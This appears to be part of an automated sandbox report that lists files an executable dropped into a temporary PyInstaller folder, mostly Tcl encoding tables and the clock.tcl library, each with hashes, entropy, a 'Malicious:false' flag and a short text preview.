                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):130093
                                                                                                                                                                                                                                                    Entropy (8bit):4.999718814637411
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:BklVEuKDDeTrVG9DAui+ur0keli1IsQVesTImhrodLzpJnlUEMwlUsozHBSOyQai:LDDeTrVKAui+ur0keli1RaesTImhrMLW
                                                                                                                                                                                                                                                    MD5:E7F4C5738A96282BD15DAEE004510B91
                                                                                                                                                                                                                                                    SHA1:A68857DF1823BEBEE83B62740E9AD668DAC69043
                                                                                                                                                                                                                                                    SHA-256:71966A6CECD4D718B8B6286573BF50539C1D4BFFAD26A1126D056A5DA48A66E4
                                                                                                                                                                                                                                                    SHA-512:41EF9624077EF5DA0ED403DABE2A647586DAAD557B4FF8A5163EBE36E2E2C7C71EFFDE23F51AD98923327160030A3786B1662D3ABBF170679F4B52FC69D4BF50
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#----------------------------------------------------------------------.#.# clock.tcl --.#.#.This file implements the portions of the [clock] ensemble that.#.are coded in Tcl. Refer to the users' manual to see the description.#.of the [clock] command and its subcommands..#.#.#----------------------------------------------------------------------.#.# Copyright (c) 2004,2005,2006,2007 by Kevin B. Kenny.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.#----------------------------------------------------------------------..# We must have message catalogs that support the root locale, and.# we need access to the Registry on Windows systems...uplevel \#0 {. package require msgcat 1.4. if { $::tcl_platform(platform) eq {windows} } {..if { [catch { package require registry 1.1 }] } {.. namespace eval ::tcl::clock [list variable NoRegistry {}]..}. }.}..# Put the library directory into the namespace

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\ascii.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1090
                                                                                                                                                                                                                                                    Entropy (8bit):2.009389929214244
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:5TUvEESVrVJ/eyN9j233V2NdWTeVCT0VbsV7EV7sYnVAMmVZyg851VqxsGkl/:5TUmJvRju3ShVbsZiAMiZyb7PF
                                                                                                                                                                                                                                                    MD5:68D69C53B4A9F0AABD60646CA7E06DAE
                                                                                                                                                                                                                                                    SHA1:DD83333DC1C838BEB9102F063971CCC20CC4FD80
                                                                                                                                                                                                                                                    SHA-256:294C97175FD0894093B866E73548AE660AEED0C3CC1E73867EB66E52D34C0DD2
                                                                                                                                                                                                                                                    SHA-512:48960E838D30401173EA0DF8597BB5D9BC3A09ED2CFFCB774BA50CB0B2ACCF47AAD3BA2782B3D4A92BEF572CBD98A3F4109FC4344DB82EB207BFDE4F61094D72
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: ascii, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\big5.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):92873
                                                                                                                                                                                                                                                    Entropy (8bit):3.255311357682213
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:3kkmY4kD7HGJxYXIdjQWTGzvKHBDViIM1sbh+dJE+FKw0sXlWVvDg21jj9:cGfKqIQCGzv8D7ksb2Ur79jj9
                                                                                                                                                                                                                                                    MD5:9E67816F304FA1A8E20D2270B3A53364
                                                                                                                                                                                                                                                    SHA1:9E35EBF3D5380E34B92FE2744124F9324B901DD3
                                                                                                                                                                                                                                                    SHA-256:465AE2D4880B8006B1476CD60FACF676875438244C1D93A7DBE4CDE1035E745F
                                                                                                                                                                                                                                                    SHA-512:EE529DA3511EB8D73465EB585561D54833C46B8C31062299B46F5B9EE7EB5BE473E630AA264F45B2806FC1B480C8ED39A173FF1756CB6401B363568E951F0637
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: big5, multi-byte.M.003F 0 89.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1250.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.286986942547087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CqTUmJvRju3ShVbsZiAMiZyb7Ptuja5z8twsDO4yT2H:JgmOEVIwAMiw/Ptuja5z8RDtyT2H
                                                                                                                                                                                                                                                    MD5:79ACD9BD261A252D93C9D8DDC42B8DF6
                                                                                                                                                                                                                                                    SHA1:FA2271030DB9005D71FAAD60B44767955D5432DD
                                                                                                                                                                                                                                                    SHA-256:1B42DF7E7D6B0FEB17CB0BC8D97E6CE6899492306DD880C48A39D1A2F0279004
                                                                                                                                                                                                                                                    SHA-512:607F21A84AE569B19DF42463A56712D232CA192E1827E53F3ACB46D373EF4165A38FFBF116E28D4EAAEF49B08F6162C7A1C517CCE2DFACA71DA07193FEFFFF06
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1250, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0083201E2026202020210088203001602039015A0164017D0179.009020182019201C201D202220132014009821220161203A015B0165017E017A.00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B.00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C.015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E.01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF.015500E100E2010300E4013A010700E7010D00E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1251.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.288070862623515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CTTUmJvRju3ShVbsZiAMiZyb7P4DRrwFsC/+H+SAJlM9aHe3cmx:wgmOEVIwAMiw/PStwFz/T5+smx
                                                                                                                                                                                                                                                    MD5:55FB20FB09C610DB38C22CF8ADD4F7B8
                                                                                                                                                                                                                                                    SHA1:604396D81FD2D90F5734FE6C3F283F8F19AABB64
                                                                                                                                                                                                                                                    SHA-256:2D1BED2422E131A140087FAF1B12B8A46F7DE3B6413BAE8BC395C06F0D70B9B0
                                                                                                                                                                                                                                                    SHA-512:07C6640BB40407C384BCF646CC436229AEC77C6398D57659B739DC4E180C81A1524F55A5A8F7B3F671A53320052AD888736383486CC01DFC317029079B17172E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1251, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.04020403201A0453201E20262020202120AC203004092039040A040C040B040F.045220182019201C201D202220132014009821220459203A045A045C045B045F.00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407.00B000B104060456049100B500B600B704512116045400BB0458040504550457.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.043004310432043304340435043604370438043

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1252.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.2209074629945476
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:C4TUmJvRju3ShVbsZiAMiZyb7PMmVurcNvPNNAkbnMH+tjg:rgmOEVIwAMiw/PMhrUok7zE
                                                                                                                                                                                                                                                    MD5:5900F51FD8B5FF75E65594EB7DD50533
                                                                                                                                                                                                                                                    SHA1:2E21300E0BC8A847D0423671B08D3C65761EE172
                                                                                                                                                                                                                                                    SHA-256:14DF3AE30E81E7620BE6BBB7A9E42083AF1AE04D94CF1203565F8A3C0542ACE0
                                                                                                                                                                                                                                                    SHA-512:EA0455FF4CD5C0D4AFB5E79B671565C2AEDE2857D534E1371F0C10C299C74CB4AD113D56025F58B8AE9E88E2862F0864A4836FED236F5730360B2223FDE479DC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1252, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0192201E20262020202102C62030016020390152008D017D008F.009020182019201C201D20222013201402DC21220161203A0153009D017E0178.00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF.00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF.00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF.00E000E100E200E300E400E500E600E700E800E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1253.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.3530146237761445
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CRTUmJvRju3ShVbsZiAMiZyb7PMuW24OrKUQQSqJWeIDmq:CgmOEVIwAMiw/PMuW2nKJQSqJWeI1
                                                                                                                                                                                                                                                    MD5:2E5F553D214B534EBA29A9FCEEC36F76
                                                                                                                                                                                                                                                    SHA1:8FF9A526A545D293829A679A2ECDD33AA6F9A90E
                                                                                                                                                                                                                                                    SHA-256:2174D94E1C1D5AD93717B9E8C20569ED95A8AF51B2D3AB2BCE99F1A887049C0E
                                                                                                                                                                                                                                                    SHA-512:44AB13C0D322171D5EE62946086058CF54963F91EC3F899F3A10D051F9828AC66D7E9F8055026E938DDD1B97A30D5D450B89D72F9113DEE2DBBB62DDBBBE456C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1253, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0192201E20262020202100882030008A2039008C008D008E008F.009020182019201C201D20222013201400982122009A203A009C009D009E009F.00A00385038600A300A400A500A600A700A800A9000000AB00AC00AD00AE2015.00B000B100B200B3038400B500B600B703880389038A00BB038C00BD038E038F.0390039103920393039403950396039703980399039A039B039C039D039E039F.03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF.03B003B103B203B303B403B503B603B703B803B

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1254.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.2357714075228494
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CWTUmJvRju3ShVbsZiAMiZyb7PMSrcmvPNNAkKMH+tZL/M:lgmOEVIwAMiw/PMSrrokKzR0
                                                                                                                                                                                                                                                    MD5:35AD7A8FC0B80353D1C471F6792D3FD8
                                                                                                                                                                                                                                                    SHA1:484705A69596C9D813EA361625C3A45C6BB31228
                                                                                                                                                                                                                                                    SHA-256:BC4CBE4C99FD65ABEA45FBDAF28CC1D5C42119280125FBBD5C2C11892AE460B2
                                                                                                                                                                                                                                                    SHA-512:CCA3C6A4B826E0D86AC10E45FFC6E5001942AA1CF45B9E0229D56E06F2600DDA0139764F1222C56CF7A9C14E6E6C387F9AB265CB9B936E803FECD8285871C70F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1254, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0192201E20262020202102C62030016020390152008D008E008F.009020182019201C201D20222013201402DC21220161203A0153009D009E0178.00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF.00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF.011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF.00E000E100E200E300E400E500E600E700E800E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1255.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.267336792625871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CfTUmJvRju3ShVbsZiAMiZyb7PMI22iEePlNQhv6l50b:MgmOEVIwAMiw/PMI27EsQhvgg
                                                                                                                                                                                                                                                    MD5:0419DBEE405723E7A128A009DA06460D
                                                                                                                                                                                                                                                    SHA1:660DBE4583923CBDFFF6261B1FADF4349658579C
                                                                                                                                                                                                                                                    SHA-256:F8BD79AE5A90E5390D77DC31CB3065B0F93CB8813C9E67ACCEC72E2DB2027A08
                                                                                                                                                                                                                                                    SHA-512:FDD9F23A1B5ABBF973BEE28642A7F28F767557FE842AF0B30B1CF97CD258892F82E547392390A51900DC7FF5D56433549A5CB463779FC131E885B00568F86A32
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1255, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0192201E20262020202102C62030008A2039008C008D008E008F.009020182019201C201D20222013201402DC2122009A203A009C009D009E009F.00A000A100A200A320AA00A500A600A700A800A900D700AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE00BF.05B005B105B205B305B405B505B605B705B805B9000005BB05BC05BD05BE05BF.05C005C105C205C305F005F105F205F305F40000000000000000000000000000.05D005D105D205D305D405D505D605D705D805D

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1256.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.3332869352420795
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:C0TUmJvRju3ShVbsZiAMiZyb7Ps0pPESLym/cwPm+ZMZjyco/fQIG/h:XgmOEVIwAMiw/Ps0FPLym/AsBfg/h
                                                                                                                                                                                                                                                    MD5:0FFA293AA50AD2795EAB7A063C4CCAE5
                                                                                                                                                                                                                                                    SHA1:38FEE39F44E14C3A219978F8B6E4DA548152CFD6
                                                                                                                                                                                                                                                    SHA-256:BBACEA81D4F7A3A7F3C036273A4534D31DBF8B6B5CCA2BCC4C00CB1593CF03D8
                                                                                                                                                                                                                                                    SHA-512:AB4A6176C8C477463A6CABD603528CEB98EF4A7FB9AA6A8659E1AA6FE3F88529DB9635D41649FBAD779AEB4413F9D8581E6CA078393A3042B468E8CAE0FA0780
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1256, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC067E201A0192201E20262020202102C62030067920390152068606980688.06AF20182019201C201D20222013201406A921220691203A0153200C200D06BA.00A0060C00A200A300A400A500A600A700A800A906BE00AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B9061B00BB00BC00BD00BE061F.06C1062106220623062406250626062706280629062A062B062C062D062E062F.063006310632063306340635063600D7063706380639063A0640064106420643.00E0064400E2064506460647064800E700E800E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1257.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.2734430397929604
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CNTUmJvRju3ShVbsZiAMiZyb7PtuWTfN641PaxUVG4da:ugmOEVIwAMiw/PtuWkgVfa
                                                                                                                                                                                                                                                    MD5:A1CCD70248FEA44C0EBB51FB71D45F92
                                                                                                                                                                                                                                                    SHA1:CC103C53B3BA1764714587EAEBD92CD1BC75194D
                                                                                                                                                                                                                                                    SHA-256:4151434A714FC82228677C39B07908C4E19952FC058E26E7C3EBAB7724CE0C77
                                                                                                                                                                                                                                                    SHA-512:74E4A13D65FAB11F205DB1E6D826B06DE421282F7461B273196FD7EECEE123EA0BD32711640B15B482C728966CC0C70FFC67AEDAD91566CA87CD623738E34726
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1257, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0083201E20262020202100882030008A2039008C00A802C700B8.009020182019201C201D20222013201400982122009A203A009C00AF02DB009F.00A0000000A200A300A4000000A600A700D800A9015600AB00AC00AD00AE00C6.00B000B100B200B300B400B500B600B700F800B9015700BB00BC00BD00BE00E6.0104012E0100010600C400C501180112010C00C90179011601220136012A013B.01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF.0105012F0101010700E400E501190113010D00E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp1258.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.226508038800896
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CKlTUmJvRju3ShVbsZiAMiZyb7PMIX2jmvPNNXkohWiZo//:xgmOEVIwAMiw/PMIXXfkohnun
                                                                                                                                                                                                                                                    MD5:BB010BFF4DD16B05EEB6E33E5624767A
                                                                                                                                                                                                                                                    SHA1:6294E42ED22D75679FF1464FF41D43DB3B1824C2
                                                                                                                                                                                                                                                    SHA-256:0CDB59E255CCD7DCF4AF847C9B020AEAEE78CE7FCF5F214EBCF123328ACF9F24
                                                                                                                                                                                                                                                    SHA-512:2CD34F75DC61DC1495B0419059783A5579932F43DB9B125CADCB3838A142E0C1CD7B42DB71EF103E268206E31099D6BB0670E84D5658C0E18D0905057FF87182
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1258, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0192201E20262020202102C62030008A20390152008D008E008F.009020182019201C201D20222013201402DC2122009A203A0153009D009E0178.00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF.00C000C100C2010200C400C500C600C700C800C900CA00CB030000CD00CE00CF.011000D1030900D300D401A000D600D700D800D900DA00DB00DC01AF030300DF.00E000E100E2010300E400E500E600E700E800E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp437.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1090
                                                                                                                                                                                                                                                    Entropy (8bit):3.447501009231115
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CFyTUmJvRju3ShVbsZiAMiZyb7P4jpuKBIrRjK8DvmH:wygmOEVIwAMiw/PYwjKgmH
                                                                                                                                                                                                                                                    MD5:8645C2DFCC4D5DAD2BCD53A180D83A2F
                                                                                                                                                                                                                                                    SHA1:3F725245C66050D39D9234BAACE9D047A3842944
                                                                                                                                                                                                                                                    SHA-256:D707A1F03514806E714F01CBFCB7C9F9973ACDC80C2D67BBD4E6F85223A50952
                                                                                                                                                                                                                                                    SHA-512:208717D7B1CBDD8A0B8B3BE1B6F85353B5A094BDC370E6B8396158453DD7DC400EE6C4D60490AD1A1F4C943E733298FC971AE30606D6BAB14FB1290B886C76D0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp437, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5.00C900E600C600F400F600F200FB00F900FF00D600DC00A200A300A520A70192.00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB.259125922593250225242561256225562555256325512557255D255C255B2510.25142534252C251C2500253C255E255F255A25542569256625602550256C2567.2568256425652559255825522553256B256A2518250C25882584258C25902580.03B100DF039303C003A303C300B503C403A60398

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp737.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
